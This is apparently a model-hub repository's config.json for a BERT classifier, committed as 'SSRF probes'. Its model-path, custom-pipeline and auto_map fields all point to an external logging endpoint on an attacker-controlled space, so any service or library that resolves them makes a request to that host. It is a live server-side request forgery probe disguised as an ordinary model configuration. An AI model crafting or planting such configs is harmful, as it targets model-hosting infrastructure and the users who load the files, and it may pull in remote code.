ssrf-metadata-test / config.json
FIRSTACCOUNT69's picture
Add config.json with SSRF probes
adc22df verified
{
"model_type": "bert",
"architectures": [
"BertForSequenceClassification"
],
"tokenizer_class": "BertTokenizer",
"pretrained_model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_pretrained_path",
"model_name_or_path": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=config_model_name_path",
"custom_pipelines": {
"text-classification": {
"impl": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=custom_pipeline_impl",
"pt": [
"BertForSequenceClassification"
],
"tf": []
}
},
"auto_map": {
"AutoModel": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_model",
"AutoConfig": "https://firstaccount69-ssrf-probe.hf.space/log?ssrf=auto_map_config"
}
}